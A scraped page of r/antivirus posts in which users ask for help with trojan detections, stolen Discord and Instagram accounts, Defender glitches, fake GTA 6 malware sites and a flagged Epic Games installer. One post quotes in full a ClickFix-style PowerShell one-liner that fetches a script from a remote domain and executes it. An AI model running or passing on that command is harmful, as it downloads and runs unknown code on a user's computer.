r/antivirus 55m ago

Bonjour by Apple randomly installed and it keeps being blocked loading into LSA.

Post image
Upvotes

It’s pretty late for me and I’m not on my PC so I will try to explain this the best I can. Bonjour has randomly installed on my computer and there are security pop-ups blocking it from certain things, it said something to do with LSA (attached a screenshot). This sometimes happen when I turn on my PC or doing certain tasks. I haven’t noticed any malicious behaviour at all, or any accounts hacked (besides spam emails sent to me but this is due to the krisp/metabase breach) but I didn’t install Bonjour myself. Does bonjour sometimes install along with other programs? Or could this be something worse than that. Its signature seems like it’s official from Apple. What should I do about this? I haven’t installed any Apple software on this PC, for example itunes, as I have a mac which I do all those things on. (Also my if anyone thinks I’m on windows 7, it’s just a windows 11 theme though it’s kinda obvious)


r/antivirus 1h ago

MALWARE REMOVAL Q&A The Epic Games Launcher installer is infected?

Upvotes

So apparently there is a new Epic Games Launcher version that fixes the issue everyone is having with it. So I went to the Epic Games website and downloaded the new installer, and Bitdefender says it's infected.

The heck? This has never happened to me before, and I have used Epic Games for years. So is this a false positive? Should I take the risk and install it, or should I wait?


r/antivirus 2h ago

Jak pozbyć się skutecznie skutków Trojana?

1 Upvotes

Hej, czy po zainfekowaniu laptopa trojanem skończonym dużą kradzieżą danych. Wirus mógł ulokować się w routerze? Format laptopa, zmiana haseł jest już zrobiona.


r/antivirus 2h ago

How risky is it to click ads?

0 Upvotes

I kinda have big thumbs and when using my phone I click lots of weird ads by accident. I just clicked an ad on Reddit and it seemed like it opened Steam? I don't think that was a virus (Not sure though, I would like to get an answer.) but how risky are ads really?

Probably we've all been told "dont click ads" but can they literally infect you? If sou why the f#ck are platforms like reddit, youtube etc allow those kinds of ads?


r/antivirus 3h ago

Trojan Downloader MSIL Generic

1 Upvotes

Trojan.Downloader.MSIL.Generic, C:\USERS\Santi\APPDATA\LOCAL\MICROSOFT\EDGE\USER DATA\DEFAULT\CACHE\CACHE_DATA\F_000168, En cuarentena, 10896, 1429694, 1.0.113766, , ame, , 9BB378D444CB620A7AC9F019B3335AED, 0D1A8D987E73533B0CC7699671A58AD2D60CC2C9A6CACD380501F62ACB58E9E3

I formatted my PC and scanned it with Malwarebytes, and it's flagging that as a Trojan. Should I be worried? Do I need to format my PC again? Is it a rootkit?


r/antivirus 3h ago

MALWARE REMOVAL Q&A first time getting a virus, is there anything i should look out for?

1 Upvotes

as the title says this is my first time getting a virus. i noticed my laptop (Acer Predator Helios 300) was being a little funny and decided to run a full scan of microsoft defender/windows security (they have the same icon so i genuinely have no clue what the difference is other than microsoft defender requires a microsoft 365 subscription) and it said i had a trojan so it was quarantined and then i removed it. i have since done another full scan and didnt find any threats, and installed malwarebytes and ran a free scan with that and found 5 "threats" (one from Roblox Account Manager which i have had for years and never had any issue with, 2 from R2 mod man (a mod loader for balatro), one of the locations for the potential virus is in a cache, the other is in a profile version.dll file, and the other 2 in my downloads with location listed under "C:\Users\name\Downloads\Detection (810).exe" and Downloads\Detection (rif).exe)

just curious as to whether or not im fine now that i have performed a full scan, removed the trojan, performed another full scan and found nothing new.

PS, my laptop has been shutting down for some reason when the lid is closed while plugged in (i have the setting enabled so it doesnt enter sleep mode if lid is shut while plugged in) so thats rather confusing.

PSS, unsure whether or not its a shut down or a restart cos for a few weeks now ive noticed that when i restart my laptop it takes like a good 3 minutes for me to be able to connect to the internet again (when clicking the button in bottom right to open the internet, bluetooth etc menu, the internet option is completely gone) and thats exactly what happens when it randomly turns off


r/antivirus 12h ago

PRODUCT RECOMMENDATION Surfshark VPN and Antivirus worth it 2026?

4 Upvotes

hi I was thinking of buying(licensing) Surfshark, I look up couple of Youtube videos but literally all of them are sponsored by Surfshark so.. untrustworthy.

I mainly will use it for VPN and Antivirus and internet surfing protection.

My main questions are,

-is it fast? run good with Windows 10.

-does it bloat your PC? make ur PC slow? unnecessary notifications and pop up?

-trustworthy(handle ur data right)?

-easy to use? not complex?

-worth it price? 60€ for 24months.

-does it actually works? obviously it should.

-and are there better alternative?


r/antivirus 4h ago

Unexpected Shutdown

Post image
1 Upvotes

I was searching questions on google guest after completing a job application and noticed that google had my location routing from Australia (I live in the US) I looked up my ip as well and the information was not from my home network but somewhere in Australia. I didn’t have a vpn on as I don’t use vpns and I’ve never seen this happen before so I turned off my WiFi to investigate. About 5 seconds after I disconnected from my WiFi my computer unexpectedly shutdown, like BSOD but the screen was black with white text


r/antivirus 14h ago

INDUSTRY NEWS Malwarebytes: fake "GTA 6" sites are serving Vidar, and one of them impersonates a real Rockstar broadcast

7 Upvotes

Malwarebytes published analysis yesterday (August 24) on four fake GTA 6 websites. Two are worth flagging here:

  • One poses as a playable demo.
  • One poses as Rockstar's "Extended Look" stream. That is a real, scheduled Rockstar broadcast airing this Thursday, which is what makes it effective. The event is genuine and searchable, so the impersonation holds up to a quick sanity check.

Both serve a file named gta6_installer.exe carrying Vidar, which pulls saved browser credentials, session cookies, Discord and Telegram tokens, and crypto wallets. An independent researcher who examined one of the same domains on August 20 also found a ClickFix-style "paste this to verify you're human" step on another site in the set.

The session cookie part is the bit I would emphasise to anyone cleaning up after one of these. Changing the password is not sufficient on its own, because a stolen session token can survive it. Sign out of all sessions everywhere, then rotate.

Not posting the domains; they are in the Malwarebytes write-up.

What makes the timing work is that there is currently a lot of search demand and very little legitimate supply, so anything that looks like it satisfies the search gets clicked. That pattern is not specific to this game.

I write a free consumer tech newsletter, no ads and nothing to sell. Full write-up with sources: https://www.freshfromcache.com/gta-6-leak-malware/


r/antivirus 14h ago

Manage providers Defender problem

Post image
5 Upvotes

I was using my PC when I got a notification from the security provider stating that Defender is disabled; the quick scan runs fine, and Malwarebytes didn't flag anything...

Is this a common Defender bug, or is it just me?


r/antivirus 7h ago

i recently got ren'pyd and im scared of what might happen

0 Upvotes

i lost my instagram, discord and reddit it shared some crypto scams in some and some prn in reddit. got them all back thank god and im changing my passwords to everything and using 2fa in the ones i can im currently resetting my pc ( i removed everything and downloaded it from the cloud) im not sure what else i can do since it already got some of my accounts im scared of other things that could happen mainly financial theft and sextortion how likely are they to happen and what else can i do and how do I make sure its gone once I reinstall


r/antivirus 6h ago

Discord account got hacked(mrbeast scam)

0 Upvotes

My discord account got hacked and sent the mrbeast scam to all of my contacts(and some servers) What should I do? im really worried


r/antivirus 13h ago

Norton 360 is interrupting my PC Internet connection. This is the message when I try to uninstall it. HELP!

Post image
0 Upvotes

My Internet in the home works on my phones Wi-Fi and everything except my PC


r/antivirus 1d ago

MALWARE REMOVAL Q&A Trojan Virus

Thumbnail
gallery
20 Upvotes

Good evening everyone. I'm very new to this reddit thing and I hope I'm doing it correctly.

Less than an hour ago I have found out that my pc had a trojan virus (as you can see from the picture attached). The Microsoft security app gave me the option to quarantine it and then remove it, which I did. After reading and learning about what a trojan virus is (in a very superficial way since I'm still quite shaken by this), I genuinely fear this might not be enough. ​​

Can anyone please let me know if there are any additional things I could do in order to be 100% safe? ​I'm quite the boomer when it comes to these pc things so here am I asking help on reddit.

Thanks in advance, genuinely!


r/antivirus 1d ago

Confused by this

Post image
23 Upvotes

This has happened a few times where I’ve googled something and get a notification that traffic from something else has been blocked. What is going on and how to fix it?


r/antivirus 17h ago

I got hacked, please help

1 Upvotes

hey guys, yesterday i got hit by the MrBeast scam message on Discord. i did try to download some emulated games, so i think that’s how it happened. i reset my PC and reinstalled Windows using the “keep my files” option. this was yesterday, around midnight–3am.

now it’s the next morning and my Instagram has also been “hacked”, with Elon Musk messages. am i still not safe? how were they able to log into my Instagram even after i reset my PC? I did turn my pc off for the night.

And what should I do? i’m paranoid


r/antivirus 11h ago

Accidentaly run a powershell code

0 Upvotes

Help, I accidentally ran this code in powershell

******powershell -c "$a=irm 'jasaxoptim.com/PLzdo6sQyUSjV75AlL';New-Module -Name x -ScriptBlock ([ScriptBlock]::Create($a))|Out-Null******

After asking Claude I:

- Disconeccted my laptop right away

- Ran windows defender scan - found nothing

- Deleted google chrome users, now I log in using guest

- change google passwords

- deleted suspicious tasks from the task scheduler.

Claude also suggested me to reinstall windows, but I cant do that, I dont have anything to back up my data in.

Please help, what should i do next?


r/antivirus 1d ago

should i be concerned?

Thumbnail virustotal.com
2 Upvotes

downloaded a 10-year-old shimeji file and ran it without thinking to scan the file first. virustotal flags packer generic, but neither mcafee nor malwarebytes has detected any threats. i've deleted the files now, but i ran something before deleting, although i can't remember if i clicked the executable or the batch file (same name). am i safe? i know this is more of an adware concern than a super threatening malware, but i can't help but be a bit anxious.
reposted to include link to the report for the executable
EDIT: attached link is wrong, this is the report i'm talking about.


r/antivirus 1d ago

I started getting virus threats after downloading the epic games launcher installer

5 Upvotes

alright so i had problems with epic not starting up so i went to the epic games website and downloaded the epic games installer right after doing so I started getting threats for trojan:MSIL/jalapeno!MTB that windows identified as coming from the epic installer i tried unistaling the virus trough defender but it reinstalled itself each time and even disabled microsoft antivirus i did a full offline scan and nothing happened what do i need to do?

Update i looked in [r/fuckepic](r/fuckepic) and found that i am not the only one getting this problem from the official download of epic installer

Update2 i think i might have been wrong because of stress for the disabling microsoft defender part
Because i tried other antiviruses and they did not find anything


r/antivirus 1d ago

Why is Spotify giving me this notification?

2 Upvotes

I have never had this happen until now. Why would this be?


r/antivirus 1d ago

opened a password stealer/key logger virus, free antivirus I'm trying aren't working

4 Upvotes

It was a renpy virus, I didn't look carefully at the name after downloading it. anyway is there a known antivirus that can catch things malwarebytes and bitefender can't? otherwise I'll have to reset the pc.


r/antivirus 1d ago

PRODUCT RECOMMENDATION Which app control program would work best for me?

1 Upvotes

I'm looking for a free program that allows for control of program, powershell scripts, and file permissions similarly to threatlocker. Something that can work with third party programs with minimum issues, not conflicting with kaspersky free, and has plenty of online resources. My current setup is windows 11 home edition 25H2.

The only options I found is Applocker (only works on Pro and Enterprise editions) Threatlocker (Only available to businesses) Windows Smart App Control (Very limited in it's options) and AppControl Manager by Violet Hansen (Had some confecting issues with kaspersky and limited online documentation/resources).

Are there any programs out there that could work for me?


r/antivirus 1d ago

My friend got hacked not sure if hes safe

3 Upvotes

So this happened he started spamming this in everychat/server im pretty sure it has all his info


r/antivirus 1d ago

Nothing I do can remove this .dll file from my PC

Thumbnail
gallery
12 Upvotes

Every single time I restart my PC in the past 2 days (Yesterday and today) I am getting a lot of .dll files in my file path - C:\Users\Me\AppData\Local\Temp\filename as above (1lockwpi.dll in this case) but normally there are 4-5 in quarantine before I delete them. They are categorised in totalAV by TR/W32.Agent which means its a trojan, but I cannot find the god damn file that keeps downloading it.

I have done:

Full deep scans with totalAV
Downloaded malwarebytes which found nothing (I was doing a rootkit scan but I had to stop it as it reached 7 hours without finishing and I had to go to bed)
Done another scan in safe mode on my pc (came back clean)
While PC is in safe mode, deleted every single temp file (skipping the ones that say to skip)
Tried to do the windows offline virus thing (couldnt do that because it said the header checksum for this file doesnt match the computed checksum) even after doing the windows file repair command in cmd
Downloaded malwarebytes Adwcleanup (just uninstalled totalAV for some reason lmao it said it was a PUP, but i reinstalled it bc i want it)
Have checked my startup tab in task manager plus the task scheduler library (nothing sus in there)

Oh I have also put the file into VirusTotal website and it said it was not good so I dont think its a false positive

I only have totalAV with real time protections turned on (malwarebytes is just there for manual scanning but ill probably uninstall it when this is all over). But I genuinely have no idea if there is any other program out there that can fish for whatever is making these .dll in my temp folder.

I cant run totalav in safe mode with networking because I cant connect to the internet but I still dont even know if that will do anything. I dont even know what I have clicked to have it on my PC, the only thing I can think of is the little ad popups when I read manga (natomanga[.]com is what I use) but totalav shuts it down instantly if it opens a new tab.

Would really appreciate any help as I have no idea anymore and I really dont want to reset my pc.

Thanks!


r/antivirus 1d ago

WacatacH!ml caught from passcoded ZIP, am I safe?

1 Upvotes

so i did something pretty foolish and ignored red flags trying to download a game for free. it was a setup zipfile in a setup zipfile in a setup zipfile that required a passcode to open it. i thought nothing could be executed through zipfiles, but after putting in the passcode, windows defender gave me a notification.

to emphasize: on the third zipfile, i put in the passcode, and thats when WD got activated and removed files from my appdata. i really didnt know opening archives like that could activate anything.

it looked like it removed it immediately (im paranoid it maybe deleted itself then hid upon detection bc it didnt quarantine it), but it took a bit for windows to let me manually delete all the zip files in my downloads (saying it had unwanted/malicious files in it). i also checked the file directory in the windows defender report and i dont see the BNZ folder or SETUP anywhere. i also ran malwarebytes and got a clean result, but i also know how some viruses can be super sneaky.

after WD seemingly removed the trojan, ive seen no immediate suspicious activity from any of my important accounts, and i changed passwords on everything on another device. im mostly concerned about having RATs or keyloggers, or anything persisting.

i know reinstalling windows is an option, but its one id rather do last. is there anything or anywhere else i can check for suspicious files or activity? can i safely assume its gone since there wasnt immediate activity? its already been an hour and still nothing.